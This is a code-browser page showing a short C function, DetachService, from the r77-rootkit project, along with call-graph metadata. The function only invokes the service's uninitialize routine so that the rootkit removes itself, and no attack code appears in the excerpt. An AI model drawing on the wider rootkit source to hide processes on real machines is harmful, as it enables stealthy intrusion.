MCPcopy Create free account
hub / github.com/bytecode77/r77-rootkit / DetachService

Function DetachService

Service/Service.c:123–127  ·  view source on GitHub ↗

Source from the content-addressed store, hash-verified

121 }
122}
123static VOID DetachService()
124{
125 // A thread was created with a pointer to DetachService(), thus requesting the r77 service to remove itself gracefully.
126 UninitializeService();
127}
128
129VOID ChildProcessCallback(DWORD processId)
130{

Callers

nothing calls this directly

Calls 1

UninitializeServiceFunction · 0.85

Tested by

no test coverage detected